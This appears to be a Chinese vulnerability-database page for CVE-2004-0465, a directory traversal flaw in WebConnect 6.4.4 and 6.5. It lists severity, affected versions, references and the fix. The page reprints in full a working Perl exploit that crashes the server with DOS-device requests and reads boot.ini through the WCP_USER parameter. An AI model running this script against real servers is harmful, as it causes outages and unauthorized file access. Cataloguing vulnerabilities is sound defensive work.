CVE-2004-0465
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:45:31
NMCOEP    

[原文]Directory traversal vulnerability in jretest.html in WebConnect 6.5 and 6.4.4, and possibly earlier versions, allows remote attackers to read keys within arbitrary INI formatted files via "..//" sequences in the WCP_USER parameter.


[CNNVD]OpenConnect WebConnect多个远程漏洞(CNNVD-200412-1020)

        WebConnect 6.5和6.4.4以及可能早期版本的jretest.html存在目录遍历漏洞。远程攻击者借助WCP_USER参数中的"..//"序列读取具有任意INI格式的文件密钥。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:openconnect:webconnect:6.5
cpe:/a:openconnect:webconnect:6.4.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0465
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0465
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1020
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110910838600145&w=2
(UNKNOWN)  BUGTRAQ  20050220 The WebConnect 6.4.4 and 6.5 contains several vulnerabilities
http://www.cirt.dk/advisories/cirt-29-advisory.pdf
(VENDOR_ADVISORY)  MISC  http://www.cirt.dk/advisories/cirt-29-advisory.pdf
http://www.kb.cert.org/vuls/id/628411
(VENDOR_ADVISORY)  CERT-VN  VU#628411
http://www.kb.cert.org/vuls/id/JSHA-69HVPK
(VENDOR_ADVISORY)  CONFIRM  http://www.kb.cert.org/vuls/id/JSHA-69HVPK
http://xforce.iss.net/xforce/xfdb/19394
(PATCH)  XF  webconnect-wcpuser-directory-traversal(19394)

- 漏洞信息

OpenConnect WebConnect多个远程漏洞
中危 路径遍历
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        WebConnect 6.5和6.4.4以及可能早期版本的jretest.html存在目录遍历漏洞。远程攻击者借助WCP_USER参数中的"..//"序列读取具有任意INI格式的文件密钥。
        

- 公告与补丁

        It is reported that the vendor has addressed these vulnerabilities in version 6.5.1. Customers are advised to contact the vendor for further information regarding obtaining and applying an appropriate update.

- 漏洞信息 (838)

WebConnect 6.4.4 - 6.5 Directory Traversal and Denial of Service Exploit (EDBID:838)
multiple dos
2005-02-24 Verified
0 Karak0rsan
N/A [点击下载]
#WebConnect version 6.4.4 - 6.5 Proof of Concept
#Coded bY ++Karak0rsan++
#karakorsankara@hotmail.com
#Usage:perl webconnect.pl [target] [port] (Default port: 2080)
#Greetz:hurby,phalaposher,r3d_b4r0n,L4M3R,zeronc,Atak,sloan,emre,
#fox and all my friends
#Konak Anatolian High School - Prep/C Class
#Sen kendini biliyosun,attigin kaziklari unutmuycam artýk okulda
#yuzume de bakamiyosun.Masum suratina,gozlerine ALDANMISIM!
#Herseyi sen baslattin sen bitirdin unutma;SENIN BENI BITIRDIGIN
#YERDE SENDE BENIM ICIN BITERSIN!!!

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
print "WebConnect 6.4.4 - 6.5 Proof of Concept\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl $0 [target] [port]\n";
}


use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...!\n";
print "[+]Allah Allah edalariyla saldiriyoz cunku biz muslumaniz:)\n";
}

use IO::Socket;
for($i= 0; $i < 30; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,Enter target address!\n";
print $socket1 "GET /COM1 HTTP/1.0\r\n";
print $socket1 "GET /COM2 HTTP/1.0\r\n";
print $socket1 "GET /COM1.jsp HTTP/1.0\r\n";
print $socket1 "GET /COM1.html HTTP/1.0\r\n";
print $socket1 "GET /COM1.smurf HTTP/1.0\r\n";
close($socket1);
}
$socket2 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket2 "GET 
/jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= 
HTTP/1.0\r\n";
close($socket2);
print "Attack finished ;)\n";
exit();

# milw0rm.com [2005-02-24]
		

- 漏洞信息 (F36253)

webConnect.txt (PacketStormID:F36253)
2005-02-26 00:00:00
 
advisory,denial of service,vulnerability
CVE-2004-0465
[点击下载]

WebConnect versions 6.4.4 and 6.5 contain denial of service and directory traversal vulnerabilities.

The WebConnect 6.4.4 and 6.5 contains several vulnerabilities such as: 
 - Denial of Service when requesting an DOS Device in Path Name 
 - Reading of files outside webroot (Directory traversal)

Requesting "DOS Device in Path Name" Denial of Service
When requesting a DOS device in the URL the server will stop responding 
to any further requests before a manual restart of service has been made. 
This attack can be preformed on both the client website and the 
administration interface. 

Vulnerable versions: 
 - WebConnect 6.4.4 (Possible previous versions) 
 - WebConnect 6.5 
 
CERT response: 
 - VU#552561 CAN-2004-0466 

 
Reading of files outside webroot (Directory traversal) 
When sending a specially crafted request to the server it is possible to 
read files outside the webroot. Since the service as default runs with 
system rights, this could give access to the entire partition that
WebConnect 
are installed on. 

Vulnerable versions:
 - WebConnect 6.4.4 (Possible previous versions) 

CERT response: 
 - VU#628411 CAN-2004-0465
 
Read the full advisory for both the vulnerabilities at:
http://www.cirt.dk/

    

- 漏洞信息

14010
WebConnect jretest.html Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

WebConnect contains a flaw that allows a remote attacker to read the contents of arbitrary files outside of the web path. The issue is due to jretest.html not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the WCP_USER variable.

- 时间线

2005-02-21 Unknow
2005-02-21 Unknow

- 解决方案

Upgrade to version 6.5.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站